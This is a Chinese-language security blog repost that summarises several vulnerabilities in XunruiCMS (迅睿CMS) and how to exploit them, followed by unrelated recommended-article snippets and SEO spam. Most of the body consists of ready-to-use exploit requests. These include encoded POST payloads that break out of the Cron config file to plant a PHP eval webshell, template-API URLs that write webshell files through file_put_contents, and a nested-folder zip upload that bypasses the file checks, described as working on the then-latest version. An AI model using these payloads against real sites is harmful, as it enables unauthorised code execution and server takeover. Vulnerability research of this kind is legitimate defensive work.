某CMS漏洞总结

40 篇文章 7 订阅
订阅专栏

声明

出品|先知社区(ID:kilomite )
以下内容,来自先知社区的kilomite 作者原创,由于传播,利用此文所提供的信息而造成的任何直接或间接的后果和损失,均由使用者本人负责,长白山攻防实验室以及文章作者不承担任何责任。

前言

1.漏洞的顺序按版本号排,从低版本到高版本

2.关于迅睿CMS的版本切换,可以通过以下方式,后面每个漏洞不再赘述:

  • 安装并配置好php与web中间件,注意该cms的低版本需要php的低版本

  • clone该cms的官方开源地址https://gitee.com/-dayrui/xunruicms

  • 通过搜索commit信息里的版本号,回退到指定的版本

在PhpStorm里,右键指定的commit版本,选择"Reset Current Branch to Here"

图片

选择"Hard",点击"Reset"

图片

4.访问,安装,登陆后台

后台地址:/admin.php

图片

迅睿CMS v4.3.3到v4.5.1后台任意代码注入漏洞(文件写入加文件包含)

触发条件

两个条件:

1.迅睿CMS 版本为v4.3.3到v4.5.1

2.登录后台,且为管理员或具有"应用"->"任务队列"的管理权限

漏洞描述

Admin控制器文件夹下Cron.php控制器的add()函数对于用户的输入没有进行专门的过滤,致使攻击者在具备管理员权限或具有"应用"->"任务队列"的管理权限时可以对WRITEPATH.'config/cron.php’文件写入任意内容,同时该文件有多处被包含且可以被利用的点,正常情况下具有上述的触发条件即可稳定触发该漏洞

环境搭建

1.安装并配置好php与web中间件,注意该cms的低版本需要php的低版本

2.clone该cms的官方开源地址

https://gitee.com/dayrui/xunruicms

3.通过搜索commit信息里的版本号,回退到指定的版本

在PhpStorm里,右键指定的commit版本,选择"Reset Current Branch to Here"

图片

选择"Hard",点击"Reset"

图片

4.访问,安装,登陆后台

后台地址:/admin.php

图片

漏洞原理

在版本v4.3.3到v4.5.0下

1.该cms在具备上述权限的情况下,可以通过http://host:port/Admin.php?c=Cron&m=add调用Admin控制器文件夹下Cron.php控制器的add()函数

图片

2.add()函数的代码:

// 任务类型public function add() {    $json = '';    if (is_file(WRITEPATH.'config/cron.php')) {        require WRITEPATH.'config/cron.php';    }    $data = json_decode($json, true);    if (IS_AJAX_POST) {        $post = \Phpcmf\Service::L('input')->post('data', true);        file_put_contents(WRITEPATH.'config/cron.php',            '<?php defined(\'FCPATH\') OR exit(\'No direct script access allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');
        \Phpcmf\Service::L('input')->system_log('设置自定义任务类型');
        $this->_json(1, dr_lang('操作成功'));
    }
    \Phpcmf\Service::V()->assign([
        'data' => $data,
    ]);
    \Phpcmf\Service::V()->display('cron_add.html');}

add()函数的分析

if (is_file(WRITEPATH.'config/cron.php')) { 
   require WRITEPATH.'config/cron.php';}

add()函数首先会在WRITEPATH.'config/cron.php’文件存在时包含该文件,WRITEPATH可在网站根目录的index.php里配置,默认情况下为网站根目录下的cache/此处还未生成该文件:

图片

$json = '';
$data = json_decode($json, true);

然后add()函数通过json_decode( j s o n , t r u e ) 函数给 json, true)函数给 json,true)函数给data赋值Null

if (IS_AJAX_POST){}

然后进入一个if分支语句,当IS_AJAX_POST时,则执行相关的写入文件的代码,否则则跳过写入文件,显示Cron的添加页面,随即结束add()函数,IS_AJAX_POST定义为当收到post请求且post的内容不为空时即返回TRUE,否则返回FALSE

$post = \Phpcmf\Service::L('input')->post('data', true);

if语句中,首先\Phpcmf\Service::L(‘input’)->post(‘data’, true)该代码通过调用Input.php文件里定义的Input类的post()函数,在接收到post请求且存在key为data时进行xss清洗然后返回,否则直接返回false,然后赋值给$post,xss清洗的代码比较长,我就不贴了,此处的xss清洗可以轻易的绕过,从而达到写入我们想要的任意内容

file_put_contents(WRITEPATH.'config/cron.php',
            ' defined(\'FCPATH\') OR exit(\'No direct script access
 allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');

if语句中,接收完post请求,即将接收到的内容通过json编码后写入

WRITEPATH.'config/cron.php’文件,可控的写入点位于字符串$json的赋值中,且在两个’的包裹中,此处是漏洞产生的主要原因,未对用户的输入做足够的判断或清洗即写入相应的文件

在/Admin.php?c=Cron&m=add页面不添加内容直接点击保存时生成的cron.php:

图片

\Phpcmf\Service::L('input')->system_log('设置自定义任务类型');
$this->_json(1, dr_lang('操作成功'));

if语句的最后,写入日志并显示操作结果,随即显示cron添加界面,add()函数结束

绕过json编码和xss清洗以及WRITEPATH.

'config/cron.php’文件中’的包裹

通过前文的分析,我们可以发现,add()函数对用户的输入基本没有特殊的防范,只要绕过xss清洗和json编码以及WRITEPATH.'config/cron.php’文件中’的包裹即可写入我们想要的任意内容

以下是我的一个思路:把会被检测到的字符或字符组合,通过各种编码进行绕过

比如<会被检测到,那就把<编码成base64或html,然后通过php内的函数再解码

下面是我的一个方法:

在WRITEPATH.'config/cron.php’文件中写入了当运行

WRITEPATH.'config/cron.php’文件时在网站根目录写一个名为webshell.php,内容为的文件的php语句

注意下述操作需要先获取csrf_test_name,获取方法:

1.访问http://host:port/Admin.php?c=Cron&m=add

2.抓包当点击"保存"时发送的post包

3.post的内容里的csrf_test_name即可一直用作一段时间内的csrf_test_name

图片

获取到csrf_test_name之后,

给http://host:port/Admin.php?c=Cron&m=addpost以下内容:

isform=1&csrf_test_name=3318a4fabdf4ea654734315a4d508a5f&data%5B1%5D%5Bname%5D=&data%5B1%5D%5Bcode%5D=%5B';file_put_contents('webshell.php',htmlspecialchars_decode('<').'?php%20eval'.base64_decode('KA==').'@$_POST%5B'.base64_decode('Ig==').'password'.base64_decode('Ig==').'%5D'.base64_decode('KQ==').';?'.htmlspecialchars_decode('>'));return;'%5D

经过url解码后为:

isform=1&csrf_test_name=3318a4fabdf4ea654734315a4d508a5f&data[1][name]=&data[1][code]=[';file_put_contents('webshell.php',htmlspecialchars_decode('<').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('>'));return;']

绕过json编码和xss清洗后,写入

WRITEPATH.'config/cron.php'文件中的内容为:
defined('FCPATH') OR exit('No direct script access allowed'); $json='{"1":{"name":"","code":"[';file_put_contents('webshell.php',htmlspecialchars_decode('<').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('>'));return;']"}}';

图片

图片

此post内容中的关键处为

[';file_put_contents('webshell.php',htmlspecialchars_decode(''));return;']

绕过json编码和xss清洗后,此处的内容变为:

[';file_put_contents('webshell.php',htmlspecialchars_decode(''));return;']

闭合了WRITEPATH.'config/cron.php’文件中’的包裹

包含写入的WRITEPATH.'config/cron.php’文件

通过前面对add()函数的分析,调用add()函数时会首先在WRITEPATH.'config/cron.php’文件存在时包含WRITEPATH.'config/cron.php’文件,因此直接访问http://host:port/Admin.php?c=Cron&m=add即可

访问http://host:port/Admin.php?c=Cron&m=add后,在网站根目录下会生成一个名为webshell.php的文件,文件内容为

图片

版本v4.5.1

add()函数的代码:

// 任务类型public function add() {    $json = '';    if (is_file(WRITEPATH.'config/cron.php')) {        require WRITEPATH.'config/cron.php';    }    $data = json_decode($json, true);    if (IS_AJAX_POST) {        $post = \Phpcmf\Service::L('input')->post('data');        if ($post && is_array($post)) {            foreach ($post as $key => $t) {                if (!$t || !$t['name']) {                    unset($post[$key]);                }                $post[$key]['name'] = dr_safe_filename($t['name']);                $post[$key]['code'] = dr_safe_filename($t['code']);            }        } else {            $post = [];        }        file_put_contents(WRITEPATH.'config/cron.php',            '<?php defined(\'FCPATH\') OR exit(\'No direct script access allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');
        \Phpcmf\Service::L('input')->system_log('设置自定义任务类型');
        $this->_json(1, dr_lang('操作成功'));
    }
    \Phpcmf\Service::V()->assign([
        'data' => $data,
    ]);
    \Phpcmf\Service::V()->display('cron_add.html');}

版本v4.5.1相较之前的版本,在获取post的内容时,修改了如下的代码:

$post = \Phpcmf\Service::L('input')->post('data',true);

改为

$post = \Phpcmf\Service::L('input')->post('data');

post()函数的第二个参数为是否进行xss清洗,因为post()函数第二个参数的默认值为true,所以这处改动理论上不造成任何影响

同时,在获取post的内容后,进行

WRITEPATH.'config/cron.php’文件的写入前,增加了如下的代码:

if ($post && is_array($post)) {    
foreach ($post as $key => $t) {        
if (!$t || !$t['name']) {            
unset($post[$key]); 
       }       
        $post[$key]['name'] = dr_safe_filename($t['name']);
                $post[$key]['code'] = dr_safe_filename($t['code']);   
                 }} else {   
                  $post = [];}

上述代码先判断post的内容是否存在且为数组,不符合则将post的内容置为空数组,满足则遍历post的内容,如果post的内容里某个键值对的value不存在或某个键值对的value的’name’key的value不存在,则销毁该键值对,然后将每个键值对的value的’name’key和’code’key通过dr_safe_filename()函数清洗,以下为

dr_safe_filename()函数的代码:

/** 
* 安全过滤文件及目录名称函数 
*/
function dr_safe_filename($string) {   
 return str_replace(      
   ['..', "/", '\\', ' ', '<', '>', "{", '}', ';', ':', '[', ']', '\'', '"', '*', '?'],       
    '',        (string)$string    )
    ;}

绕过json编码,xss清洗,dr_safe_filename()函数的过滤和WRITEPATH.'config/cron.php’文件中’的包裹

此处我们先不尝试绕过dr_safe_filename()函数,而是尝试另一个极其简单的方法

通过对xss清洗函数的审计和版本v4.5.1add()函数新增加的代码的审计,可以发现对于数组的key没有任何过滤,包括多维数组的每一维度的key,所以此处可以通过修改post的内容中的key来写入我们想要的任意内容

以下是我的一个思路:把要写入的文件或要执行的代码,进行各种编码,然后通过php的函数进行解码,比如把编码成base64或html,然后通过php内的函数解码

以下是我的一种方法,整个漏洞利用过程中,除了上述所述的关于add()函数中增加的对键值对的value的过滤,其他流程相较于之前的版本没有任何变化,获取到

csrf_test_name之后,给

http://host:port/Admin.php?c=Cron&m=addpost以下内容:

isform=1&csrf_test_name=9f3342fbce7b49c85f05776bf89db778&data%5B1%5D%5Bname%5D=1&data%5B1%5D%5Bcode":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'%5D=1

经过url解码后为:

isform=1&csrf_test_name=9f3342fbce7b49c85f05776bf89db778&data[1][name]=1&data[1][code":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;']=1

绕过json编码和xss清洗以及dr_safe_filename()函数的过滤后,写入WRITEPATH.'config/cron.php’文件中的内容为:

defined('FCPATH') OR exit('No direct script access allowed'); $json='{"1":{"name":"1","code\":\"1\"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw\/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'":"1","code":""}}';

图片

此post内容中的关键处为

":"1"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'

绕过json编码和xss清洗以及dr_safe_filename()函数的过滤后,此处的内容变为:

\":\"1\"}}';eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoJ3dlYnNoZWxsLnBocCcsJzw\/cGhwIGV2YWwoQCRfUE9TVFsicGFzc3dvcmQiXSk7Pz4nKTtyZXR1cm47'));return;'

闭合了WRITEPATH.'config/cron.php’文件中’的包裹

包含写入的WRITEPATH.'config/cron.php’文件

通过前面对add()函数的分析,调用add()函数时会首先在

WRITEPATH.'config/cron.php’文件存在时包含WRITEPATH.'config/cron.php’文件,因此直接访问http://host:port/Admin.php?c=Cron&m=add即可

访问http://host:port/Admin.php?c=Cron&m=add后,在网站根目录下会生成一个名为webshell.php的文件,文件内容为

图片

3e77c85372e9c338cf7983c938a0b.png)

迅睿CMSv4.5.0到v4.5.1

前台代码注入漏洞

这个是别的师傅挖的,我第一次见到是在先知社区,详见

https://xz.aliyun.com/t/10002是同站的文章,我就不转过来了,如果想知道漏洞原理可以去看一下,下面就贴一下我的一个利用方式

一个利用方式

写webshell文件:

写入的文件默认是在网站根目录下,经过测试,如果写入的内容包含,会被url转义,但是先写<再写?就不会被转义

写入php标记为的php文件:

1.先写<:

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=<

图片

图片

2.写剩余的语句:

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=?='';file_put_contents('webshell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3ZWJzaGVsbCddKTs/Pg=='));%20param2=FILE_APPEND

图片

图片

写入php标记为的php文件

1.先写<:

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=<

图片

图片

2.写剩余的语句:

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=file_put_contents%20param0=webshell2.php%20param1=?php%0dfile_put_contents('webshell.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWyd3ZWJzaGVsbCddKTs/Pg=='));%20param2=FILE_APPEND

图片

图片

写完之后,访问webshell2.php,会在同目录下生成

webshell.php文件,webshell.php即为webshell

图片

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-1EtteIPQ-1659339829778)(https://mmbiz.qpic.cn/mmbiz_png/Bsj96JurMJYcep8gCwAw60ByREKN7o33xnQ357cOj0spnp3VyYCIQicRhy5bvGENVYOVn0kyQ8F7fpgTYjKpZYg/640?wx_fmt=png)]

图片

执行无参函数

如果想执行无参函数,例如phpinfo();,将url中的param0参数设为-1即可:

/index.php?s=api&c=api&m=template&app=admin&name=api_related.html&phpcmf_dir=admin&mid=%20action=function%20name=phpinfo%20param0=-1

图片

返回的内容不在正常的html标记里,所以没有在前端打印出来,可以在网页源文件里找到:

图片

迅睿CMSv4.5.4到v4.5.6
(目前最新版)文件上传漏洞

这个是别的师傅挖的,我第一次见到是在这个站https://www.0daying.com/post-71.html

触发条件

两个条件:

1.迅睿CMS 版本为v4.5.4到v4.5.6(目前最新版)

2.登录后台,且为管理员或具有"应用"->"联动菜单"的管理权限

漏洞描述

后台"应用"->“联动菜单”->"导入"处可上传zip文件,且该处没有对用户上传的zip压缩文件做相应的过滤,导致用户可以上传任意文件

漏洞利用

版本v4.5.4

将要上传的文件压缩为zip格式,然后登陆后台,在具备相关权限的情况下,在"应用"->“联动菜单”->"导入"处直接上传该zip文件,同时上传时必须要抓包,响应包中会返回上传的文件的物理路径

图片

图片

图片

图片

图片

响应包中返回的物理路径通常为*/cache/temp/*.zip,而通过该漏洞上传的zip文件在上传成功后会自动解压,自动解压的过程中会自动在zip文件的同目录下创建一个名为压缩包去掉后缀名的文件名的目录,再将压缩包内的文件解压到此目录。

因此,通常情况下如果上传一个名为webshell.zip,且压缩包内有一个名为webshell.php的文件的压缩包,那么,通过该漏洞上传zip文件之后,压缩包内的webshell.php文件的物理路径为*/cache/temp/webshell/web-shell.php,

通过url访问

http://domain:post/cache/temp/webshell/webshell.php

下面截图的路径和上面说的路径不一致应该是版本问题,该CMS官网发布的v4.5.4版本上传后的路径是上面说的,通过该CMS的官方代码库回退的版本可能是下面截图的这种*/cache/temp/linkage-import-file-1-1/webshell.php,总之要看响应包内的路径,把响应包内最后的.zip换成/webshell.php即可

图片

图片

版本v4.5.5和版本v4.5.6

(目前最新版)

相比版本v4.5.4,这两个版本增加了对压缩包内文件的检测,但是此处我们先不尝试绕过相应的检测,而是尝试另一个更为简单的方法

这两个版本未对压缩包内的文件夹进行递归检测,因此只要把恶意文件放在文件夹内再压缩然后上传即可

图片

图片

图片

图片

相比版本v4.5.4,在上传该zip压缩文件时依旧可以通过抓包获取文件的物理路径,同时因为增加了一层文件夹,相应的解压之后的压缩包内的文件的物理路径变为*/cache/temp/linkage/webshell/webshell/webshell.php,url变为

http://domain:post/cache/temp/linkage/webshell/webshell/webshell.php

下面截图的路径和上面说的路径不一致应该是版本问题,该CMS官网发布的v4.5.6版本上传后的路径是上面说的,通过该CMS的官方代码库回退的版本可能是下面截图的这种

*/cache/temp/linkage/linkage-import-file-1-1/webshell/webshell.php

总之要看响应包内的路径,把响应包内最后的.zip换成/webshell/webshell.php即可

图片

图片

常见的CMS及其漏洞
ChiYanq7ng的博客
11-24 263
综上以上的一些cms网站相对内容是免费的比较适用于小型和个人的门户,对自己想要的网站已经拥有了规定的整体架构,直接复制粘贴到规定的目录中就可以进行使用。一般的免费网站所给的是用PHP+mysql结合的后端形式,前端已经有了一定的规定范式,如果自己有自己的意愿可以进行修改,往前端添加自己喜欢的元素和相应的内容。除了擦除整个WordPress安装的可能性,如果没有可用的当前备份可能会带来灾难性的后果,攻击者可以利用任意文件删除的能力来规避一些安全措施并在Web服务器上执行任意代码。Discuz ML!
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 7085
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
Web安全 EmpireCMS漏洞常见漏洞分析及复现,2024年最新三幅图给你弄懂EventBus核心原理
qq194582923的博客
04-15 1128
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。
CMS漏洞复现
qq_44832048的博客
07-19 9746
dedeCMS (CNVD-2018-01221) 类型: phpcms系统:dedecms、帝国cmsphp168、phpcmscmstop、discuz、phpwind等asp类cms系统:zblog、KingCMS等国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。 dedeCMS (CNVD-2018-01221) 漏洞简介...
XunRuiCMS-V4.3.13-2021-01-24_xunrui_
10-01
迅睿开源建站cms系统,是非常好的一款建设企业网站的系统
Web安全 EmpireCMS漏洞常见漏洞分析及复现
最新发布
2401_84297796的博客
04-28 689
点击下一步就会自动在数据库生成一个empirecms的数据库并在其中建立许多个表然后再设置进入后台管理员的密码下一步即可安装完成,这里提示要删除路径避免被再次安装,但是这个地方其实设置了两层保护,即使你访问install这个路径会有一个.off文件在路径下,需要将这个.off文件删除后才能再次安装输入设置的后台管理员用户名和密码即可进入管理员后台。
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2614
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
cms总结文档
02-24
cms总结文档,cms总结文档cms总结文档cms总结文档cms总结文档,cms总结文档
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
03-22
极致CMS(以下简称_JIZHICMS)的一次审计-SQL注入+储存行XSS+逻辑漏洞.pdf
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL注入漏洞后台演示,利用 sqlmap与burpsuit注入,需具备php基础
齐博CMS V7任意文件下载漏洞
09-07
# 齐博CMS V7任意文件下载漏洞 ## 漏洞影响 ``` 齐博cms V7 ``` ## FOFA ``` app="齐博cms" ``` ## Poc 综合验证和利用脚本见 Qibo_v7.py
网站安全检测 对帝国CMS代码的后台功能性安全测试
网站安全资讯
09-09 605
撸了今年阿里、头条和美团的面试,我有一个重要发现.......>>> ...
常见的cms以及对应的cms历史漏洞
WSGWZlz的博客
11-24 1086
WordPress 是最流行的开源CMS之一,用于创建博客和网站。它具有丰富的插件生态系统,易于使用,并支持大量主题。Joomla!是一个强大的开源CMS,适用于创建各种类型的网站。它提供丰富的扩展和模块,可用于定制网站功能。Drupal 是一款灵活的开源CMS,适用于创建各种类型的网站,从个人博客到企业级门户。它具有强大的模块化和可扩展性。: Metinfo是一款专注于企业建站的CMS,适用于企事业单位的网站建设。它提供了丰富的功能和模块,以满足企业网站的需求。
CMS系统漏洞分析溯源(第6题)
tpaer的博客
11-03 650
靶场通关记录
熊海CMS 1.0代码审计漏洞集合
good good study
10-11 5491
熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。 下载 ——>熊海cms v1.0 SQL注入1 漏洞位置:commen.php 漏洞参数:cid 如下传入的cid参数经过了addslashes函数的过滤处理,能过滤掉引号字符 但是如下语句中cid参数并没有被引号包裹,故addslashes函数对其不生效,存在数字型注入 在cid.
帝国cms漏洞分析前台XSS漏洞
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-05 1901
帝国cms漏洞分析前台XSS漏洞 一、帝国cms漏洞描述 该漏洞是由于javascript获取url的参数,没有经过任何过滤,直接当作a标签和img标签的href属性和src属性输出。 二、帝国cms漏洞复现 1、需要开启会员空间功能(默认关闭),登录后台开启会员空间功能。
迅睿CMS 网站表单管理
08-29 991
上面章节我们创建一个“测试”的网站表单,下面来介绍下如何管理它的数据 创建完网站表单之后,更新全站缓存,再按F5刷新整个后台,就可以看到以下链接 这里可以对他进行基本的管理操作。 前端投稿发布权限 默认地表单发布时会进入审核状态,如果你安装过“用户系统”就可以对他进行详细权限...
Seacms漏洞
Grey的博客
07-10 5000
海洋CMS6.45前台getshell漏洞复现结果:http://127.0.0.1/CMS/seacms_v6.4/upload/search.phppost:searchtype=5&amp;order=}{end if} {if:1)phpinfo();if(1}{end if}1.漏洞的触发点是在search.php 中的echoSearchPage()函数可以触发漏洞。常规的分析都是先找...
时间条件竞争漏洞 cms
12-20
时间条件竞争漏洞是一种常见的网络安全漏洞,通常发生在CMS(内容管理系统)中。这种漏洞利用了程序中的时间相关功能,例如文件的创建或修改时间,来进行攻击。攻击者可以利用这个漏洞来获取未授权的访问权限,或者进行其他恶意操作。 时间条件竞争漏洞的原理是在程序执行的不同时间点进行不同的操作,从而绕过系统的安全检查。例如,攻击者可以在某个请求发送后立即修改文件,然后在系统检查文件时,修改已经生效,导致安全检查失败。 要防范时间条件竞争漏洞,首先需要对CMS系统进行严格的安全审计和测试,确保程序中没有潜在的时间条件竞争漏洞。其次,开发人员需要在代码中加入适当的同步和锁定机制,以防止在不同时间点发生冲突,从而避免漏洞的利用。另外,及时更新CMS系统的补丁,也是防范时间条件竞争漏洞的有效措施。 总的来说,时间条件竞争漏洞是一种常见但危险的安全漏洞,对于CMS系统的开发和管理者来说,需要高度重视并采取相应的安全措施来防范这类漏洞的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
写文章

热门文章

  • 实战分析某红队魔改哥斯拉Webshell 9239
  • Apache APISIX Dashboard(CVE-2022-24112)命令执行漏洞方式利用 7658
  • CVE-2020-1472 Netlogon特权提升漏洞分析及复现 7071
  • 内网渗透|内网攻防—多级代理 6229
  • Fastjson反序列化漏洞复现分析 5432

分类专栏

  • 内网渗透 50篇
  • 漏洞分析及复现 40篇
  • 代码审计 15篇
  • 梦游系列

最新评论

  • 某Office2.02前台RCE分析

    3L2: 你好 那如何修补这个漏洞或者有何措施可以把这个进行屏蔽

  • 浅析APP代理检测对抗

    mcniyuan: 哥 我用了ProxyDroid代理 但是游戏还是打不开.求指导

  • CVE-2022-39198 Apache Dubbo Hession Deserialization分析

    hengliang_: 为什么我的jdk8里面没有UnixPrintServiceLookup

  • CVE-2022-27925Zimbra Collaboration存在路径穿越漏洞最终导致RCE

    Sky1_L: 存在路径穿越的zip包构造好了,如何发送特定 POST 请求呢

  • ThinkPHP文件包含漏洞分析

    Passerby_Wang: 写得也太详细了吧,学到了好多 也欢迎博主来我这里指点一二呀表情包表情包表情包

大家在看

  • ThreadLocal源码分析 310
  • 普通卷积和深度可分离卷积的区别?通俗易懂 322
  • RAG PAPTOR 示例代码理解笔记 441
  • 02 DHCP原理与配置 830
  • SpringBoot与Mybatis的后端项目

最新文章

  • JDBC MySQL任意文件读取分析
  • CVE-2021-31956提权漏洞分析与利用
  • 对Java JFinal_cms的一次审计过程
2023年5篇
2022年102篇

目录

目录

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43元 前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值

深圳SEO优化公司普洱网站搭建哪家好潜江网站建设多少钱衡阳企业网站制作报价武汉网络推广徐州SEO按天收费哪家好通辽建站芜湖网站优化按天收费报价兴安盟营销型网站建设报价安康营销型网站建设价格大丰英文网站建设哪家好宿迁SEO按效果付费推荐松原网站关键词优化自贡营销网站公司吉祥企业网站设计价格垦利百度爱采购哪家好大浪网站优化软件多少钱宜宾网站优化软件报价阿坝营销型网站建设哪家好清远seo报价吴忠网站建设枣庄百度网站优化排名报价固原网站改版报价赤峰高端网站设计价格荆门营销型网站建设报价扬州关键词排名包年推广广元外贸网站建设报价松岗网站优化按天扣费报价巴中模板网站建设报价黄南网站seo优化报价双龙百姓网标王推广哪家好歼20紧急升空逼退外机英媒称团队夜以继日筹划王妃复出草木蔓发 春山在望成都发生巨响 当地回应60岁老人炒菠菜未焯水致肾病恶化男子涉嫌走私被判11年却一天牢没坐劳斯莱斯右转逼停直行车网传落水者说“没让你救”系谣言广东通报13岁男孩性侵女童不予立案贵州小伙回应在美国卖三蹦子火了淀粉肠小王子日销售额涨超10倍有个姐真把千机伞做出来了近3万元金手镯仅含足金十克呼北高速交通事故已致14人死亡杨洋拄拐现身医院国产伟哥去年销售近13亿男子给前妻转账 现任妻子起诉要回新基金只募集到26元还是员工自购男孩疑遭霸凌 家长讨说法被踢出群充个话费竟沦为间接洗钱工具新的一天从800个哈欠开始单亲妈妈陷入热恋 14岁儿子报警#春分立蛋大挑战#中国投资客涌入日本东京买房两大学生合买彩票中奖一人不认账新加坡主帅:唯一目标击败中国队月嫂回应掌掴婴儿是在赶虫子19岁小伙救下5人后溺亡 多方发声清明节放假3天调休1天张家界的山上“长”满了韩国人?开封王婆为何火了主播靠辱骂母亲走红被批捕封号代拍被何赛飞拿着魔杖追着打阿根廷将发行1万与2万面值的纸币库克现身上海为江西彩礼“减负”的“试婚人”因自嘲式简历走红的教授更新简介殡仪馆花卉高于市场价3倍还重复用网友称在豆瓣酱里吃出老鼠头315晚会后胖东来又人满为患了网友建议重庆地铁不准乘客携带菜筐特朗普谈“凯特王妃P图照”罗斯否认插足凯特王妃婚姻青海通报栏杆断裂小学生跌落住进ICU恒大被罚41.75亿到底怎么缴湖南一县政协主席疑涉刑案被控制茶百道就改标签日期致歉王树国3次鞠躬告别西交大师生张立群任西安交通大学校长杨倩无缘巴黎奥运

深圳SEO优化公司 XML地图 TXT地图 虚拟主机 SEO 网站制作 网站优化